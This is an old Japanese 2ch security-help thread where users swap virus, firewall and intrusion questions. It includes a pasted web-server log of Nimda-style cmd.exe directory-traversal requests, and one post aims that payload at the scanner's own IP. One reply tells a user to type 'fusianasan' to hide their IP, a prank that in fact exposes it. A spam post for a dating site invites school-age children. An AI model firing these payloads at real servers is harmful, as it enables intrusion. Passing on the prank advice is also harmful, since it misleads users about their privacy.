どうせここの暇人からかって遊んでるだけなんでしょ？
バレバレでツマンナイよ。

>>373
アクセス拒否しかないですねぇ

>>374
そーか、ネタにマジレスしてしまったのか・・・あほらし。寝よう。

3 回 聞 い て も 要 領 の 得 な い 質 問 は ネ タ

>>340も早く寝なさい。

今>>377が中途半端にいいこと言った！

確かに3回やり取りしてまだダメなら多分ずっとダメだ。
つーわけでそこのお前、次のくだらねぇ質問をどうぞ↓

何遊んでんの君ら？

>>306
ダウンロード中にファイルがぶっこわれたかも知れないし、
そもそも ftp サーバ上のファイルがぶっこわれたかも知れないし、
トロイ入りかも知れない。

とりあえず、その tar 玉は make すべきではない。
Sophos for Linux （フリー）あたりで検査してみそ。

http//www.symantec.co.jp/region/jp/sarcj/vinfodb.html
これってウイルスですか？（：は抜いています）

>>382
http://www.symantec.co.jp/

>>383
まあ、URL削ってみるってのは判断の目安程度にはなるな。

>382
http://pc.2ch.net/test/read.cgi/sec/1026862203/767

こんばんは。マルチさん

klez.Hに感染しました。
ウィルスバスターは起動しないし、
上記のノートン無料セキュリティチェックで
検出→ファイルを削除しようとすると
ＩＥのブラウザごと消えてしまいます。
これ以上、どうすればいいのか分かりません。
誰か助けてください。

>386
http://www.trendmicro.co.jp/klez/

ｉモード　メールハック　について

１）ｄｏｃｏｍｏの鯖に侵入

２）指定アドレスにメール送信の場合、自分のアドレスにも送信させるトロイをしかける

３）ハック完了

この方法しか浮かばない俺は厨房ですか？？？

>388
なんなんだ一体…

XPでNmapNTを起動しても、一瞬コマンドプロンプトがでるだけで、
終了してしまうんですが、どうしたらいいでしょうか？
ちなみに、Pcapはいれてあります。

>>390
エラーメッセージを読め。

>>390
command prompt から起動すればいいのでは？

みんなアンチウィルスソフト常駐させてる？

させている

>>393
させてないな

させている

>>393
インストしてない

させていない

OutlookExpressの新規メール作成画面がたくさん出るﾔｼありますよね？
あれって、キーボード連打で消せないのでしょうか？
どなたかご教示願います。
さっき、これでフリーズしました凹

消せるが多分無理だ。

くだらない質問はここに書き込めのスレにも答えられんようなスレは

_____
　| 　|. ∧∧
=====(,,ﾟДﾟ)∩=
　|＿|.⊂　　ノ
　　　　/ 　０
　　　　し´

　　　　　　　　∧∧　　 　ミ　＿　ドスッ
　　　　　　　 (　 　,,)┌―─┴┴─―┐
　　　　　　　/　　　つ.　　糸冬　了　　│
　　　　　〜′　/´　└―─┬┬─―┘
　　　　　　∪ ∪　 　　　 　 ││　_ε３
　　　　　　　　　　　　　　 ゛゛'゛'゛

>>399
根本的な解決ではないが、JavaScript切っておけ。
おかしなリンクを開く場合はソースを先に確認しておけ。

>>401
> くだらない質問はここに書き込めのスレにも答えられんようなスレは
日本語勉強しろ。

まあ、くだ質に回答するのは好意でいいんだが
隔離スレとしての責務は果たして欲しいところ。

>>402
まず、おまいの脳を直せ

>>403
確かに。へたな回答なら、ないほうがまし。
しかし、ぜんぜん隔離されていないという話も・・・

>>404
煽りは別のスレでやってくれないか。

昔はmailtoストームでフリーズしてたような気がするが
最近は「リソース足んねーよ」ってでてメーラーだけが落ちる
時代が変わったのかなぁ・・・

NT系にするという手もありだね。
MUAは落ちるかもしれんが。凍結よりましでしょ。

Alt+F4で可能な限りの対応しかないだろうな。
運悪いと他のアプリが引っ掛かって、その間に結局死ぬかも。

レジストリでIEデフォルトの電子メールクライアントを削除は？
変更したことはあるが、試したことはないので可能かどうかは不明。
つーか、ブラクラチェッカー使えよ。

チャットに入りたいのですがパスワードを入力しなければなりません。
入る方法はありますか？
ttp://chat.mimora.com/common/chat.mpl?roomnum=051097

>>411
簡単です、パスワードを入力すれば入れますよ

>>412
そのパスワードが分らないんですよ。
パスワード入力しないで無理矢理入れないですかね？

マジで教えてください、今日中に入れないと洒落になりません！
此処の板の住人はこの程度ですか？
違うでしょう？数ある板から選ばれたプロフェッョナルでしょう？
みなさんの実力を試すのです！！
きっと入れるはずでしょう。
これは私のためだけでなく、皆さんの為にもなるのです！
さぁ、パスワードを入力しないで入る方法、もしくはパスワードを知る方法を教えてください。
なるべく簡単な手段がいいです。
お願いします。

すいません、windows2000　IE5.5 Norton Internet Security
を使用しているのですが、履歴、キャッシュ、index.datファイルを
削除して再起動したにもかかわらず、
板の特定のスレッドがまだ、クリックしていないのにも
かかわらず、クリックされた状態で表示されます。

ＰＣ初心者板で質問したところ、
「仕様」と言われたのですが、これは具体的にどういうことなのでしょうか？

もしよろしければ、教えてくださいよろしくお願いいたします.


なんででしょうか？

>>414
ローカルルールを読め。
> 様々なネット上の危険からの防御法や対策を語りあうための板です。

> また、この板ではアタック依頼は受け付けません。
> 攻撃依頼を見かけた方は、放置してください。

>>415
仕様は、「そのような動作しかできない。意図的に
そのようにしている」という意味と考えればよろし。

手元に IE 5.5 がないので、再現できるか不明だけど、
「インターネットオプション」→「全般」で、
「ページを履歴に保存する日数」をゼロにしてもだめ？

（・Ａ・）　ダメデス

>>417
Easy CD Createrをインストールしていないか？

これ、某プロパの公式Proxy通してるんだけど、なぜYahooBBになるんだろ？？

むふふ。いたづらし放題だ。

>>418
>>418は>>415に対してだろ。

>>421
です。失礼。

>>415
http://homepage2.nifty.com/winfaq/c/ietrouble.html#687

怪しげなメールが携帯に届きます。
携帯のメールに、件名にしかメッセージが入ってなくて
しかも意味不明な英語。。。
“Happy　Assumption”

メールはどうやらパソコンから来てるみたいで
@より後ろがu01.gate01.c。

どこのドメインなんでしょうか・・


お願いします誰か助けて。

klezだろうけど
携帯でwindowsのウィルスが発症するかどうか小一時間考えろ

>>423はマルチ
klezの刑に処されます

>424-425
ありがとうございます！！
これで安心して眠れる；＿；
ほんとにありがとう！！

age

一般人がＩＰアドレスで個人情報を（住所や名前）ひきだすのは簡単なことなのでしょうか？
最近おどし？みたいにそんなことをほのめかされて落ち込んでおります

メール欄にＡＣＣ奴Ｓのメアド入れるのはダメですか？
ウイルス送る馬鹿が釣れて面白いと思うんだけど

Windows2000(SP2)で
ルーターの中からAN HTTPを使って
WEBサーバーを立てているのですが
これだけだとセキュリティに問題ありますでしょうか？
ルーターはポート80しか開けてません。
他に何かセキュリティ対策のソフトを導入するべきでしょうか？

>>428
不可能

>>429
意味不明　あんた精神障害者？

>>430
Winでサーバーを立てること自体が問題ありあり

>>431
やや不適切。問題はOSの種類ではなく管理者のスキル。

>>430
そんなことを聞く時点でアウト。80使った攻撃などいくらでもある。
http://japan.cnet.com/Enterprise/Story/020716/
もっと勉強してから立てろ。

Antivir PEとkerioと江戸マックスの設定をしなきゃなんないのに
甥とか姪とかイトコとかいうウィルスが漏れの活動を邪魔します
盆休みを正常に実行するにはどうしたらいいですか・・・

>>433
頭ぶったたいて、怒鳴り散らせ。。。

甥、姪、イトコ等のウィルスは
兄・姉・両親等のセキュリティホールにつけこんで増長するので
検疫や駆除のしようがないです・・・

age

http-basic認証なんですけど、
rfcには３回失敗したら、
不可ですとか書いてあるのですか？

この板、Macro.src ウイルスに感染してません？

>>438
していません

>>438の頭、Macro.src ウイルスに感染してません？

本当にくだらない質問ですみません。
再起動すると毎回「次のファイルが見つかりませんでした」
ってのが無数にでてきて、とゆーかガンガン増えていって、
消してもすぐまた増殖し始めます。
これはやはりウイルスでしょうか？

>>441 OS再インストール
＞ウイルスでしょうか？
アンチウィルスソフト入れてないのか？

>>442
AVGなら入れてますが無反応です。

汚染を除去しました。

>>443
情報不足
いつから
どんなエラーが
どの時点ででる？
ネタか？

>>445
ネタではなかったんですがOSの再インスコにより直りました。
このレスのみなさんにご迷惑おかけしたこと、深くお詫びします。

すみませんでした。そしてありがとうございました。

すみません教えて下さい。
ADSLでNATルーター使ってるのですが、最近よくルーターのログに
外から１２７．０．０．１へアクセスがあります。
IP調べてみると中国とか台湾とかからのアクセスなんですが、
これはなにかされてるのでしょうか？
OSはWinMeとMacOS９で両方ともノートンセキュリティが常駐してます。

>>447
詳しいログなしでは何とも言えん
おおかたNimdaに感染したサーバからのアクセスでは？

アダルトサイトに行くなと。。。

＞448
すみません。
127.0.0.1/1300 TCP自分の接続アドレス　宛先65.19.142.162/80

という風にでます。
127のポートは全てそのつどばらばらです。
宛先もばらばらで、ポートもばらばらです。

昨日は宛先アドレスが楽天だったり他の同系列サイトだったりとかも
ありましたが、いつもはIPドメインサーチで中国とか台湾とか出ます。

それで不思議なのが、127へアクセスがある時は必ずIPドメインサーチ
へアクセスできません。

ヲチ板変なんだけど。。スレにアクセスできない。なぜ？

oyster7.he.net
にゅ？

ttp://oss.jodi.org/i/index.html

上記のブラクラを踏んでからリンク先のウィンドウが
毎回最小で開くようになりました。様々検索して調べたのですが修復の仕方が
どうしても分かりません。どなたかご回答よろしくおねがいいたします。

>>453
ブラウザを再インストール

ご回答ありがとうございます。今ブラウザはIE6.0を使用していますが、
再インストール以外に方法はないのでしょうか？
ブラクラチェッカーでソースを見るとレジストリをいじられたような気がするのですが・・・
質問ばかりで本当にに申し訳ありません。

>>455
再インストールしたくない理由はなんだ？

jdbgmgr.exe　ってなんですか？

>>457
http://www.google.co.jp/search?q=jdbgmgr.exe&ie=Shift_JIS&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=

>>458　thanks!次から自分で検索くらいしまっす。。

>>456さん、ありがとうございます。再インストールしたくないわけではありません。
ただ、何をされたのかが知りたいのと、
お気に入りとか、大事なファイルが消えてしまうのではないかという
気がしてしまいましたもので・・・

逆に考えれば
「そのページを見ればリンク先をウィンドウ最大化で開けるようになる」
っていうページも作れんのかな？

結構画期的だと思うんだが誰か神がいないもんかなぁ

>>460
何をされたか知る必要があるのか？
くだらんブラクラのことを細かく知る必要はねえよ

消えてしまうと思うのならバックアップ取れよ
何から何まで指示されないとできないのか？

>>460
Σ(ﾟдﾟ;)

>>462さん　すみません。では１度バックアップを取ってブラウザを再インストール
してみます。ありがとうございました。

パソコンを立ち上げると、身に覚えのないメールを
勝手に送信しようとします。
ノートンのプライバシー制御が働いて、
送信せずに済んでいますが、悪意のある何かでしょうか？
ちなみに、アドレスはhotmailです。
どなたかお教え下さい。お願いします。

>>461
エロサイトでよくあると思うが

>>465
多分だが、
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

ノートン入れてるのに検知しないのが気になる。
PFWのみか？

>>467さん
早速のご回答ありがとうございます。
それから、お返事が送れて申しわけありません。
書き込めなくなっていたものですから....

「ノートン入れたら」のスレをみて、ちゃんと設定
しているつもりですが。

確認したところ、やはりウイルス定義は最新のものです。

申しわけありませんが、PFWの意味が分かりません。

465の「パソコン」を「outlook express」に訂正いたします。
詳しい状況としましては、毎回おなじアドレスに送信しようとします。
セキュリティに引っかかるということは、個人情報をそのアドレスに
送ろうとしていると思い、気になっています。

そういうプログラムってあるのでしょうか。

書き忘れてました。468は私です。
それに、省略されてしまい申しわけありません。

やっと、書き込めるようになりました。

>>469
OEの送信トレイが空っぽだとしたら、
MSNメッセンジャに自動ログオンしてるとか。
一度OEのオプション項目を確認汁。
PFWはPersonal Fire Wall。

>>470
ご回答ありがとうございます。
確認したところ、MSNにはログオンしてませんでした。

ノートンがちゃんと働いているので、
あまり気にすることもないでしょうか？

PFW=パーソナルファイアーウォール

しまった、ボケるの忘れた・・・

>>450
それってoutbound connectionじゃないのか？
だったらつじつまが合うんだけど。
とりあえず、宛先のwhois。IPドメインサーチはあてにならん。
Query: 65.19.142.162
Registry: whois.arin.net
Results:
Hurricane Electric (NETBLK-HURRICANE-4)
760 Mission Court
Fremont, CA 94349
US
Netname: HURRICANE-4
Netblock: 65.19.128.0 - 65.19.143.255
Maintainer: HURC
Coordinator:
Hurricane Electric (ZH17-ARIN) [email protected]
510 580 4100

PFW入れてないのか？NATの意味理解してる？

>>474
>>450への答えは>>452が何げに書いてるよ。
↓のスレ参照。
http://pc.2ch.net/test/read.cgi/sec/1002776091/l50

>>475
おっと、それは失礼した。不覚・・・

しかし>>452も
もう少し親切に書いてやればいいものを(w

>>438
やっぱりここってそのｳｨﾙｽに感染してる？感じはする・・・。
昨日の明け方にはどうもなかったのに。
確かにﾉｰﾄﾝの誤反応っていうのも考えられるけど、
いつも何でも誤反応で済ませて本当に大丈夫なのか？
っていう疑問はいつもありますが・・・。
他の方々のご意見はいかがなんでしょうか・・・？

>>478
>>444とかに貼られているスクリプトに反応してるだけ。
こういうのはLoveletterだろうがMacro.srcだろうが
表示されるだけで実行はされないから大丈夫。
だから誰も騒がない。

>>478 しつこいね。自分で調べたのか？　過去ログにもあるし上にあがって
るスレでも誤反応のスレはあるだろう。>>1にも書いてあるし。
http://pc.2ch.net/sec/kako/1013/10130/1013006745.htmlの220以下
http://pc.2ch.net/test/read.cgi/sec/1025872269/

アクセス解析で身元がバレないように
「クッションをおく」ってよく聞くんですけど
どうしたらいいのですか？
教えてください。よろしくお願いします。

板違いだったらごめんなさい。
誘導してくれると嬉しい。

串刺すんじゃネーノ？


　　 λ＿λ　　　 　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　　（　｀ー´）　＜　つか、身元かくして何やらかすか聞きたいんじゃネーノ？
　　 /　　　ﾉつ　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　（人＿つ_つ

"machXXX-YYY-ZZZ-JJJ.drms.dla.mil"って所から執拗にリアル厨房に攻撃くらうんだけど
これって・・tracerouteすると横田基地を通ってて・・もしかして、国内??

drms.dla.milって、サイト見ると、米軍放出品販売してるみたいなんだけど、
まさか回線も放出品?(w　このホストアドレスに心当たりある人いますか??

このサーバ、踏み台にされてるのかな・・・
通報したほうがいいかなぁ

串刺すってどゆこと？
他でも同じ事言われたが意味がわからない

>>484
具体的になにをやりたいのか目的を言え。実のところそれ次第だし。

＞他でも同じ事言われた
マルチかよ。「プロキシ」、「プロクシ」で検索しろ。以上。

もしおまいのPCが念力でここに繋がってんでなけりゃ、検索エンジンで検索しろ

>>483
milって米国空軍じゃなかったかな？
まさか踏み台にされてるとは思えんけど…

そいえば以前「gov」って串があったなぁ(遠い目)

>>479
詳しいご説明どうもありがとうございました。
実は自分も、もしかして>>444などのスクリプトが原因かな？
と思ってはいたんですが、いまひとつ自信がなかったんです。
もしかして勘違いじゃなかったら怖いと思ったので。
でも、おかげでとても安心しました。
>>480
過去ログや>>1、専用スレにもあるのはもちろん知っていましたが、
何にでも誤りだと思ってて実は本物だった・・・ということは
可能性として有り得るかも・・・と不安だったのです。
スレ貼りのお手数をおかけしました。失礼しました。

気に入らないﾔｼに「ﾋﾟﾝｸﾞ」で嫌がらせしたいんですが
詳しいｺﾏﾝﾄﾞがわかりません。
どなたかご教示願えませんか？

% man ping

>>490
pingなんかで嫌がらせはできないけどな

鍵穴にアロンアルファを流し込め

私はホングコングに行ったことがありますが、何か？

http://kado7.ug.to/net/


朝までから騒ぎ！！
　　　小中高生
　コギャル〜熟女まで
　　　メル友
　　i/j/PC/対応

女性の子もたくさん来てね
　　小中高生大歓迎です　　　　　　　　　　　　　　　　　
全国デ−トスポット情報も有ります。
全国エステ＆ネイル情報あります。

　　激安携帯情報あります。

みなさん暑いですね。
暑中見舞いにグリーティングメールを送る人がいますが
これってセキュリティ的にどうなんでしょうか？
直接もらうメールと違って知らないところにメールアドレスが
保管されるのって嫌じゃないですか？

>>496
だったら君はメールアドレス持ってても意味無いね

馬鹿みたいですね>>497

>>495氏ね
そんなことより　聞いてくれよおっちゃん
このサイト面白いぞ　小一時間ワラタ
http://www.ogaki-tv.ne.jp/~zeus/

こいつが送ってきた名無しファイル
[email protected]>

>>500
削除依頼出せ。
KLEZだったら別人の可能性ありだ。

どなたかイメヌ対策について教えてください。

なんか兄貴にLANで監視されてるらしいですけど拒否する事は出来ないんですか？

イメヌ関連スレなどありましたら教えてください。イメヌのために夜も眠れません。

>>503
勝手な被害妄想はよそで

>>503
ケツ貸してやれ

JAVAチャットでロムってるとき串刺しても生IPがもれるんですが、
対処方法はないですか？

>>507
漏れて結構。
問題ナシ

>507でつ
表示させないようにすることはできないってこと？

IPについてなんだけど、

p0121-ip01fukuokachu.fukuoka.ocn.ne.jp（←適当に作ったIPです）

からは何がわかるの？
何が何を意味するのか知りたいです。お願いします！

>>510
本当はわかってるんじゃないか？
つかマルチするなよ

ヴァーチャルセックスって妊娠させてしまう事ありますか？

p0121-ip01fukuokachu→あなたの住所
fukuoka→あなたの氏名
ocn→あなたの年齢
ne→性別
jp→配偶者の有無

>>512
ある、つーか去年愛人に双子が生まれた

ここってネタスレだったのか。

>>511
自分の知らない質問は全てマルチかよ。ｲﾃ〜な(w

>511
ごめんなさいマルチとかじゃないです。
ただ何が何を意味してるのか知りたかっただけです。
IPで検索しても勉強できそうなとこなくてカキコしてみました。
気分害したらゴメンね。

>>510

http://www.mse.co.jp/ip_domain/

ここで調べてみたら？
何が何を意味するかは俺も初心者同然なのでわかりません。ｽﾏﾇ!

>>517>>510
>（←適当に作ったIPです）
見え透いた嘘は止めろ。どこでどう検索したのか書け。

ping

知り合いのｵﾔﾂﾞがpen４　２G　mem　１０２４M
のパソを買いました。
でも、使い道といったら…
mp3聞いたり「ｽｰｼﾞｰ」でスライドショーを楽しんでるだけなんです。

もったいないと思いませんか？

test

携帯電話のシステムを破壊するウイルスってまだ開発されてないんですか。

>>523
ない。

Sygateをアンインスコしたいんですが、いざしようとすると
『You cannot install this version of Sygate Personal Firewall/
Sygate Security Agent over the previous version.Please uninstall your
current version before installing this software.』
と出てアンインスコできません。
使ってるＯＳはＸＰＰｒｏです。

>>453の質問をしてIEを再インストールという方法を回答いただいたのですが、
実践してみるとExplorerが原因でSHELL32.DLLにエラーが発生してWindows（Me）
が開けなくなりました。復旧方法はないでしょうか？（セーフモードでの起動もアウトですた）
今自宅のパソコンからは何もできない状態です。

ime.nu関連スレ・もしくはサイトなどありましたら教えてください。

>>526
http://homepage2.nifty.com/winfaq/c/9xboot.html#649
これは試した？

>>528さんありがとうございます。
Ｍｅの起動ディスクを作っていなかったので、今知人のパソコンの
２０００で起動ディスクを作ろうとしていますが、
この２０００で作成したディスクで起動できるのでしょうか？
質問ばかりで本当に申し訳ありません。

>>529
ダメでしょ。

>>529
ダウンロードセンターからダウンロードできるんじゃないの？
少なくともXPのは↓ここにある。Meのも探せば見つかると思う。
http://www.microsoft.com/downloads/release.asp?ReleaseID=33305

俺ヘタレなんで見当違いのレスだったらすまそ。

>>531
ない、と思う。
OSは詳しくないので間違っているかもしれんが。
Xpの起動ディスクがDLできるのは知ってたよ。
でも、Meは検索しても「ダウンロード」できると書いてあったところはなかった。

つーか、板違いだよな。
Win板に行った方が良いと思われ。

どこぞにうｐすっかえ？

>>533さん
出来ましたらよろしくお願いいたします。
板違いで本当に申し訳ありません。
今回のような出来事は初めてで本当に困ってましたもので・・・。

うｐ
ttp://www4.lib.net/~red/upload/u_file120020817170220.zip

>>535さんすみませんでした。
見た時間が遅かったのか、Ｎｏｔ　Ｆｏｕｎｄになってしまいました。
本当にご迷惑をおかけいたします。出来ましたら再アップお願いできませんでしょうか？
板違いで本当に申し訳なく思っていますが、なにとぞよろしくお願いいたします。ｍ（＿＿）ｍ

もいっかい
ttp://www4.lib.net/~red/upload/u_file120020817185513.zip
pass:ithought3butwere4infact

537さま、本当にありがとうございました！
これで復旧できるようにがんばります。
私の神様です。本当になんと御礼を言ってよいかわかりません。
失礼いたしました。

WindowsXPで、ログオン時に「ようこそ」画面を使うより、
NT/2000の頃のログオン方式の方がセキュアだと聞きましたが、
物理的に自分のマシンに触れるのは、泥棒にでも入られない限り
自分独りだけ、という環境でもその方が良いのでしょうか？
もちろんパスワードは設定してあります。

>>539
Ctrl+Alt+DeleteのアクションはNW経由のアタックのために
あると聞いたことがあります。
その辺を考慮して決めてください。

>>540
Ctrl+Alt+Delのアクションとは、
ログオン時にCtrl+Alt+Delを押す、というものでしょうか。
それとも緊急シャットダウンのことでしょうか。

どちらにせよ、Net経由のアタックを考えるなら、
「ようこそ」画面を使わない方が良さそうですね。

レスありがとうございました。

２ｃｈのIDについておながいします
町BBSは同じIDをよく見ますが
たとえば違う板で同じケーブル会社を使って
いる人がいれば同じIDになるのでしょうか？

ノートンインターネットセキュリティのサービス期間がもうすぐ終りそうです。
アンインストールして、再インストールしたらもう一回使えますか？

>>543
まぁそれなりに・・・・・

>>542
マルチポスト
二度と２ちゃんねるに来るな
氏ね！
http://pc.2ch.net/test/read.cgi/hack/1029020585/531

>>544
すみません、「それなりに…」とおっしゃいますと、
何かデメリットみたいなものがあるのでしょうか？
できれば詳しくお願いします。教えて君で申し訳ないです…。

>>546
いわゆるウイルス最新定義の更新ができなくなるので
体験版並みにしか使えません

>>545
なにを根拠にマルチと言っているのか
知りませんが2chで　質問は初めてですが何か？

最近なんか変なんですうちのＰＣ
時々なんですけど、ダイアルアップ接続のウィンドウの
タイトルバーに
「20式ダイアルアップ」って出たり。
ＹＡＨＯＯ開いたときにタイトルバーが
「インターネットかゆいうま」って出たりするんです。
ウィルスバスターは常に最新の状態で使用しているので、
ウィルスの可能性は低いと思いますが…。
どなたかご存知の方、教えてください。

更新定義できるよ
NAV2001ならね

>>550
はい、それです。そのまま再インストールで使用できるのですか？
何か操作しなくてもできますでしょうか…。

>>549
「伺か」を使ってたら「キャプションいじり」のチェックをはずせ。
それいがいの原因はしらん。

HDDフォーマット→OS再インストール、とかで
レジストリをキレイさっぱり消さなきゃ使えんだろ>>543

>>543
http://pc.2ch.net/test/read.cgi/bsoft/977951848/

Windows2000server漬かってるんですが，クラックされてました．
ターミナルサービスのポートが変えられ，ログオンできなくなったため，気付きました．
焦った…

イベントビューアで確認したところ，
どうにかこうにかして，ユーザー名の一覧を取得して，
パスワードクラッカーのような物で，クラックされ，乗っ取られたようです．
パスワードを複雑な物にしたので，今のところ，再度乗っ取られている様子は
ないのですが，アタックは依然として続いています(失敗の監査：ログオンの失敗
ってログが大量に…)


つーわけで，ユーザー名の一覧を取得させないにはどうしたらよいんでしょうか？

いま、怪しいメールが来たんです
NAA01477 <[email protected]>

A special nice game

Hi,This is a special nice game
This game is my first work.
You're the first player.
I wish you would like it.

どうでしょう？　car［17］.jpgというファイルも添付されてきました。

>>555-556
ネタですか？

>>556はマルチだな

ネタじゃないんだけど・・

>>559は逆ギレ中です。

スマソ

ねたじゃないっす…

まじで，おせーてください．

だから何？って話だな。
どうしたいか書いてないしネタっぽいな。

>>555
まともな知識がないならMeでもつかってろ。

>563

>つーわけで，ユーザー名の一覧を取得させないにはどうしたらよいんでしょうか？

ってことです．

>>565
>どうにかこうにかして，ユーザー名の一覧を取得して，
こいつがわからないと、どうにもならんだろ。

>566
まぁー，そういう事なんですけど，
Win2kにはfingerの用な機能があるって事なんでしょうか？
んで，それを，封じ込めることはできるんでしょうか？
ってことです．

>556
とても面白いゲーム。
こんにちわ、これはとても面白いゲームです。
わたしが始めて作ったゲームです。
あなたが始めてのプレイヤーです。
あなたが気に入ってくれることを願います。

そんな面白そうなゲームができるなんて羨ましい。

>>567
net系コマンドじゃん？
net user 〜とか。。。
あとフォルダのアクセス権のところでユーザーが見れるっすよ。
ってか大学のパソが2kで、そこで使ってるだけなのであんまり知識ないっすけど。

２チャンネルの他の場所で、IME(IME2000/ATOK)は、再変換のために、
入力した文字全てのログファイルを持っていると、発言している人が
いました。

ということは、Win95/98/ME では、メールやチャットの内容は全てバ
レバレですよねえ…

本当のこと知っている人教えてください

>569
ありがとうございます．

netコマンドだと，確かに見ることはできますが，
telnet以外で外部から，このコマンドを実行することなんてできるんでしょうか…
当然，telnetは動かしていないし，telnetを使うにしても，
元々，ユーザ名とパスワードを知らなくてはならないかと…
なぞです…

http://news3.2ch.net/test/read.cgi/news/1029637408/l50
は何！？
＞＞９８は何！？

>>555
> パスワードを複雑な物にしたので，今のところ，再度乗っ取られている様子は
> ないのですが
へ〜。

>>573
システムを再構成したあとの後の話に決まってるだろバカ
パスワード変えただけで再運用する管理者なんていねーよ

嫌な物を発見してしまいました…

クラックされたと思われる日から，
日付け指定で作成されたファイルを検索してみたところ，
winntautoattack.exeってのと，filelock.exeという，
謎のファイルが仕込まれておりました…
どうやら，うちの鯖は前者のツールでクラックされたようです…
上のwinntautoattackでgogle検索をかけると，謎中国語ページに…
右のツールは何なのか謎です．

＞574
すいません．
ここにいます．どーやって，クラックしているの興味があるんで．

>>555
「バックドア」について調べてみれ。
で、回線切って首つって氏ね。

いちどでも侵入されたらそのシステムは「すべてが信用ならない」んで、
回線切ったあとあらゆる手段を用いて原因を究明し当局に報告したあと
再インストール（に、当たるもの）をするってのが一般的処置なんじゃないかと…

>>575
原因が不明なままで運用してるの？TBC並の管理だね。

何回繋ぎ直しても、ウイルスバスターのログに
204.123.2.72←ここからの下のログが残ってるんだけど、
クローキングは心配ないとかいてありましたが、
どうなんでしょう？毎日何十個と同じログがあります。
何で何回繋ぎ直しても204.123.2.72←ここから来るんでしょう？

時刻　　　　　05:06:08
受信/送信　 　受信　
プロトコル　　ICMP　
送信元IP　　　204.123.2.72
送信元ポート　N/A
送信先ポート　N/A
説明 Cloaking

>>579
ウイルスバスターは使ったことがないので、そのログの正確な意味はわからないけど。
http://webaccessup.com/cloaking.html
あんまり気にしていると頭はげるよ。

>>579
ちなみに自分のhttpdのログ。
218.11.26.206 - - [18/Aug/2002:00:52:21 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 153
218.11.26.206 - - [18/Aug/2002:00:52:23 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:24 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:24 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:25 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:25 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:26 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:26 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:27 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:27 +0900] "GET /sc?/c+dir HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:28 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:29 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:29 +0900] "GET /scripts/..@5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:30 +0900] "GET /scripts/..@5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:30 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
218.11.26.206 - - [18/Aug/2002:00:52:31 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 134
こんなのは日常茶飯事。

つまり心配するなって事ですか？

>>582
ログからして心配ない。
>>581のはなんか違うが（w
ルータでも入れたら？

核爆発があんな程度でいいんですか？

>>584
アメリカ人の映画なんてそんなもの。

581はNimdaさんではないだろうか。

>>586
たしかにニムダ君だ
「それでなに？」なんだな　もーあきたしぃ

>>583
ありがとう。安心しますた。

今時Nimdaをわざわざhttpdで受け取ってる方が珍しいｗ

http://218.11.26.206/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

>>589
だってアクセスまったくないと寂しいでしょ（w

macro.srcウイルスってどんなやつなのか教えてください

>>592
http://securityresponse.symantec.com/avcenter/venc/dyn/27941.html

>>591
この板とおなじだな。
厨な質問でもないよりまし。。。

ワイルドってどいうことなんですか？
英語ばかりでよくわかりませんが…

usno.pa-x.dec.com [204.123.2.72]

初めてこちらに参りましたしだいです。
２チャンネル発言時に、IPが分からなくなるようにする方法をどこかでチラッと見て、
コピーしたつもりが出来てませんでした。
名前欄になんと打ち込めばよいのでしたでしょうか。どうかお教えいただきたいデス。

fusianasanだっけ？

おい　お前ら　おれはケツ毛大臣だ。
文句あるのか！！

　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　コケコッコォー
　 　　　/　 /
　　　　ノ￣ゝ

>>599
偽物です。

XPなんですが、DOSで動くアプリ（Nmapなど)が起動しても、一瞬にしてコマンドプロンプトが閉じてしまうんですが、どうしたらｲｲのでしょうか？
コマンドプロンプトから動かさず、アプリをダブルクリックで起動できるようにする方法はないのでしょうか?

>>601
標準入力からデータ入力がなければ（多分ヘルプを表示して）正常終了する。

ダブルクリックで起動してるようですがこれ以上なにをどうしろと？

test

>>601-602
つーか板違い。

>>602
データ入力も何も、一瞬にして終了してしまうんで何も入力できないんです。

ダブルクリックできちんと起動してるんだってば。
ていうか>>604がよめんか？

>>605=アフォ

598sama,beriberisankusudesu

nmapの問題なのかコマンドプロンプトの問題なのか切り分けができないんだろな。

コマンドプロンプトの使用法の問題（不具合じゃないんだが）。
PC初心者かWindows板へ。

>>601
[スタート]→［すべてのプログラム］→［アクセサリ］→［コマンド プロンプト］

>>610
>コマンドプロンプトから動かさず

[スタート]→［すべてのプログラム］→［ゲーム］→［ソリティア］

フリーで1番軽いファイアーウォールソフトは何ですか？

そのへんで歩いてるヤリマンでが一番やすいとおもいます。
ソープは高いし。

>>613
Tiny。

